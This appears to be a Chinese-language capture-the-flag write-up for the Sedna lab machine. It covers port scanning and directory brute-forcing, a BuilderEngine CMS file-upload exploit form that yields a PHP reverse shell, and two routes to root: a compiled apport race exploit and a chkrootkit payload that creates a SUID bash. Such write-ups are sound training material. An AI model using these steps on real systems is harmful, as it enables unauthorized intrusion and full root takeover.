Sedna 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.144                           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 05:57 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00059s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
993/tcp   open  imaps
995/tcp   open  pop3s
8080/tcp  open  http-proxy
37302/tcp open  unknown
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)

开放了22, 53, 80, 110, 111, 139, 143, 445, 993, 995, 8080, 37302

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:01 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00060s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|   256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
|_  256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (ED25519)
53/tcp    open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_Hackers
110/tcp   open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP STLS PIPELINING SASL CAPA RESP-CODES
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37302/tcp   status
|   100024  1          46167/tcp6  status
|   100024  1          54981/udp6  status
|_  100024  1          58453/udp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_imap-capabilities: more capabilities STARTTLS IDLE post-login LOGINDISABLEDA0001 LOGIN-REFERRALS Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ ENABLE have
|_ssl-date: TLS randomness does not represent time
445/tcp   open            Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities IDLE more ENABLE post-login AUTH=PLAINA0001 Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ LOGIN-REFERRALS have
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) UIDL TOP AUTH-RESP-CODE PIPELINING USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
37302/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:0:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 9h19m57s, deviation: 2h18m34s, median: 7h59m56s
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-09-21T14:01:48-04:00
| smb2-time: 
|   date: 2023-09-21T18:01:48
|_  start_date: N/A

Ubuntu 操作系统, /robots.txt，smb, nft, 8080 Apache Tomcat/Coyote JSP engine 1.1

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap --script=vuln -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:02 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00038s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|   /files/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|   /system/: Potentially interesting folder
|_  /themes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
110/tcp   open  pop3
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
445/tcp   open  microsoft-ds
993/tcp   open  imaps
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
995/tcp   open  pop3s
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
8080/tcp  open  http-proxy
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
37302/tcp open  unknown
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false

80 端口 /robots.txt, /files/, /modules/, /system/, /themes/

8080 端口 /examples/, /manager/html/upload, /manager/html, /docs/

目录爆破

目录爆破一下

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo gobuster dir -u http://192.168.56.144/ -w /usr/share/seclists/Discovery/Web-Content/big.txt
[sudo] password for kali: 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.144/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/09/21 07:46:42 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 290]
/blocks               (Status: 301) [Size: 316] [--> http://192.168.56.144/blocks/]
/files                (Status: 301) [Size: 315] [--> http://192.168.56.144/files/]
/modules              (Status: 301) [Size: 317] [--> http://192.168.56.144/modules/]
/robots.txt           (Status: 200) [Size: 36]
/server-status        (Status: 403) [Size: 294]
/system               (Status: 301) [Size: 316] [--> http://192.168.56.144/system/]
/themes               (Status: 301) [Size: 316] [--> http://192.168.56.144/themes/]
Progress: 20271 / 20477 (98.99%)
===============================================================
2023/09/21 07:46:46 Finished
===============================================================

Web 渗透

翻找文件夹的时候，看到了这样一张图片

一个预览的图片，其中包含了 cms 的名字和产品，搜搜有没有漏洞

<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
	<input type="file" name="files[]" />
	<input type="submit" value="send" />
</form>
</body>
</html>

将以上代码存为 html 文件，本地访问并上传 php 文件，抓包看一眼

提前开启监听，尝试访问 http://192.168.56.144/files/php.php

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nc -lvnp 443                                                       
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.144] 40078
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
 16:15:08 up  2:18,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:ed:69:55 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.144/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:feed:6955/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
$ sudo -l
sudo: unable to resolve host Sedna
sudo: no tty present and no askpass program specified
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Sedna:/$ 

提权

查看网站目录

www-data@Sedna:/$ cd /var/www
cd /var/www
www-data@Sedna:/var/www$ ls
ls
flag.txt  html
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$ cd html
cd html
www-data@Sedna:/var/www/html$ ls -liah
ls -liah
total 133M
277818 drwxr-xr-x  9 www-data www-data 4.0K Oct 25  2016 .
277817 drwxr-xr-x  3 root     root     4.0K Oct 22  2016 ..
282968 -rw-r--r--  1 root     root      225 Jun 10  2016 .htaccess
262151 -rw-r--r--  1 www-data www-data  65M Oct 24  2016 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
283341 -rw-r--r--  1 www-data www-data  65M Aug 17  2016 BuilderEngine-CMS-V3.zip
283378 -rw-r--r--  1 www-data www-data 638K Oct 24  2016 Hack_The_Planet.jpg
283376 -rw-r--r--  1 www-data www-data 275K Oct 24  2016 Hack_The_Planet2.jpg
283377 -rw-r--r--  1 www-data www-data 124K Oct 24  2016 Hack_The_Planet3.jpg
283370 -rw-r--r--  1 www-data www-data 181K Oct 24  2016 Sedna.jpg
283011 drwxr-xr-x  5 www-data www-data 4.0K Jun 10  2016 block_holders
283021 drwxr-xr-x 54 www-data www-data 4.0K Oct 24  2016 blocks
262152 drwxr-xr-x 19 www-data www-data 4.0K Oct 24  2016 builderengine
283003 -rw-r--r--  1 www-data www-data 1.4M Jun 10  2016 codecept.phar
283004 -rw-r--r--  1 www-data www-data  392 Jun 10  2016 codeception.yml
282971 drwxr-xr-x  6 www-data www-data 4.0K Sep 21 16:14 files
283005 -rw-r--r--  1 www-data www-data 2.2K Jun 10  2016 finder.html
283374 -rw-r--r--  1 www-data www-data 166K Oct 24  2016 hack-planet-1280-amox-zone.jpg
283375 -rw-r--r--  1 www-data www-data 256K Oct 24  2016 hack-planet-high-definition-mobile.jpg
283372 -rw-r--r--  1 www-data www-data 176K Oct 24  2016 hacker-manifesto-ethical.jpg
283373 -rw-r--r--  1 www-data www-data 603K Oct 24  2016 hacking.jpg
283369 -rw-r--r--  1 www-data www-data  101 Oct 25  2016 index.html
283007 -rw-r--r--  1 www-data www-data 1.2K Jun 10  2016 license.txt
401193 drwxr-xr-x  9 www-data www-data 4.0K Oct 24  2016 modules
283379 -rw-r--r--  1 www-data www-data 560K Oct 24  2016 pososibo-ethical-hacking-hack-fond.jpg
283009 -rw-r--r--  1 www-data www-data   36 Oct 25  2016 robots.txt
402200 drwxr-xr-x  8 www-data www-data 4.0K Oct 24  2016 system
402431 drwxr-xr-x  6 www-data www-data 4.0K Oct 24  2016 themes
283010 -rw-r--r--  1 www-data www-data    0 Jun 10  2016 weather.png
www-data@Sedna:/var/www/html$ cat .htaccess
cat .htaccess
<IfModule mod_rewrite.c>

    RewriteEngine On

    SetEnv HTTP_MOD_REWRITE On

    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ index.php?/$1 [L]

</IfModule>

查看家目录，定时任务，

www-data@Sedna:/var/www/html$ ls -liah /home
ls -liah /home
total 8.0K
262147 drwxr-xr-x  2 root root 4.0K Oct 28  2016 .
     2 drwxr-xr-x 21 root root 4.0K Oct  7  2016 ..
www-data@Sedna:/var/www/html$ ls -ilah /etc/passwd /etc/shadow /etc/crontab
ls -ilah /etc/passwd /etc/shadow /etc/crontab
131332 -rw-r--r-- 1 root root    722 Feb  9  2013 /etc/crontab
156213 -rw-r--r-- 1 root root   2.0K Nov  4  2016 /etc/passwd
156215 -rw-r----- 1 root shadow 1.3K Nov  4  2016 /etc/shadow
www-data@Sedna:/var/www/html$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

查看SUID

www-data@Sedna:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
131133   88 -rwsr-xr-x   1 root     root        88752 Jun  3  2014 /bin/mount
131146   40 -rwsr-xr-x   1 root     root        38932 May  7  2014 /bin/ping
131174   68 -rwsr-xr-x   1 root     root        67704 Jun  3  2014 /bin/umount
147037   32 -rwsr-xr-x   1 root     root        30112 Dec 16  2013 /bin/fusermount
131147   44 -rwsr-xr-x   1 root     root        43316 May  7  2014 /bin/ping6
 21755   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
 22577   16 -rwsr-xr-x   1 root     lpadmin     13672 Jul 18  2014 /usr/bin/lppasswd
 20867   20 -rwsr-xr-x   1 root     root        18136 May  7  2014 /usr/bin/traceroute6.iputils
   417   32 -rwsr-xr-x   1 root     root        30984 Feb 16  2014 /usr/bin/newgrp
 20897   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
   535  156 -rwsr-xr-x   1 root     root       156708 Feb 10  2014 /usr/bin/sudo
   348   68 -rwsr-xr-x   1 root     root        66252 Feb 16  2014 /usr/bin/gpasswd
   277   36 -rwsr-xr-x   1 root     root        35916 Feb 16  2014 /usr/bin/chsh
 25122   84 -rwsr-sr-x   1 root     mail        83872 Oct 21  2013 /usr/bin/procmail
   274   44 -rwsr-xr-x   1 root     root        44620 Feb 16  2014 /usr/bin/chfn
 22441   20 -rwsr-xr-x   1 root     root        18168 Feb 11  2014 /usr/bin/pkexec
   429   48 -rwsr-xr-x   1 root     root        45420 Feb 16  2014 /usr/bin/passwd
 20934  484 -rwsr-xr-x   1 root     root       492972 May 12  2014 /usr/lib/openssh/ssh-keysign
 22446   12 -rwsr-xr-x   1 root     root         9804 Feb 11  2014 /usr/lib/policykit-1/polkit-agent-helper-1
   624    8 -rwsr-xr-x   1 root     root         5480 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
  1588   12 -rwsr-xr-x   1 root     root         9612 Apr 12  2014 /usr/lib/pt_chown
 25608   12 -rwsr-xr-x   1 root     root         9752 Jun 11  2012 /usr/lib/authbind/helper
146763  324 -rwsr-xr--   1 root     messagebus   329856 Jul  3  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 20956  316 -rwsr-xr--   1 root     dip        322968 Jan 22  2013 /usr/sbin/pppd
 21187   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Jun  3  2014 /usr/sbin/uuidd
 22434   36 -rwsr-xr-x   1 root     root        34568 Jun 27  2013 /sbin/mount.cifs
 29051   88 -rwsr-xr-x   1 root     root        88412 Nov  6  2015 /sbin/mount.nfs

内核提权

内核版本蛮低的，而且 gcc 还在，考虑内核提权

尝试了以上列表中 3.x 内核的 exp，都失败了，脏牛提权会导致系统崩溃

linpeas 给出的结果参考意义也不是很大

看了眼 WP，这里有两种提权方法，内核提权：搜索关键词是 Ubuntu 14.04

www-data@Sedna:/tmp$ gcc 37088.c -o 37088
gcc 37088.c -o 37088
www-data@Sedna:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 4761
apport stopped, pid = 4762
getting pid 4761
current pid = 4760..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..2500..
** child: current pid = 4761
** child: executing /bin/su
sleeping 2s..

checker: mode 4534
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
sudo: unable to resolve host Sedna
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip  chkrootkit  flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305

chkrootkit 提权

上传 pspy 看看

www-data@Sedna:/etc$ chkrootkit --version
chkrootkit --version
The program 'chkrootkit' is currently not installed. To run 'chkrootkit' please ask your administrator to install the package 'chkrootkit'
www-data@Sedna:/etc$ cd chkrootkit
cd chkrootkit
www-data@Sedna:/etc/chkrootkit$ ls
ls
ACKNOWLEDGMENTS  README.chklastlog  chklastlog.c    chkutmp.c
COPYRIGHT        README.chkwtmp     chkproc.c       chkwtmp.c
Makefile         check_wtmpx.c      chkrootkit      ifpromisc.c
README           chkdirs.c          chkrootkit.lsm  strings.c
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V
./chkrootkit -V
chkrootkit version 0.49

chkrootkit 是有漏洞的版本

www-data@Sedna:/tmp$ echo "cp /bin/bash /tmp/bash;chmod +xs /tmp/bash" > update
www-data@Sedna:/tmp$ cat update
cat update
cp /bin/bash /tmp/bash;chmod +xs /tmp/bash
www-data@Sedna:/tmp$ chmod +x update
chmod +x update
www-data@Sedna:/tmp$ ls
ls
hsperfdata_tomcat7  pspy32  pspy64  tomcat7-tomcat7-tmp  update

等待等待，再等待

www-data@Sedna:/tmp$ ls -laih
ls -laih
total 6.8M
  245 drwxrwxrwt  5 root     root     4.0K Sep 23 10:25 .
    2 drwxr-xr-x 21 root     root     4.0K Oct  7  2016 ..
29063 -rwsr-sr-x  1 root     root     964K Sep 23 10:25 bash
28995 drwxr-xr-x  2 tomcat7  tomcat7  4.0K Sep 21 17:36 hsperfdata_tomcat7
29060 -rwxrwxrwx  1 www-data www-data 2.9M Sep 21 09:40 pspy32
29059 -rwxrwxrwx  1 www-data www-data 3.0M Jul 20 03:32 pspy64
  951 drwxr-xr-x  2 tomcat7  root     4.0K Sep 21 17:36 tomcat7-tomcat7-tmp
29061 -rwxrwxrwx  1 www-data www-data   43 Sep 21 19:23 update

成功得到了 SUID 的 /tmp/bash

总结

这台靶机在 Web 渗透阶段的难度倒不是很高，主要在于判断 cms，我巧合翻到了预览的图片，直接就拿到了信息。而在提权阶段，测试了八九个 exp，都提权失败了。这里也学到了两个小技巧，第一不要只将内核版本作为关键词搜索，可能由于 exp 编写者没有关注内核版本（过去 exp 可能编写没那么严谨），所以只按内核去搜，可能会漏掉一两个 exp，第二是 pspy 的作用，过去一直忽略了。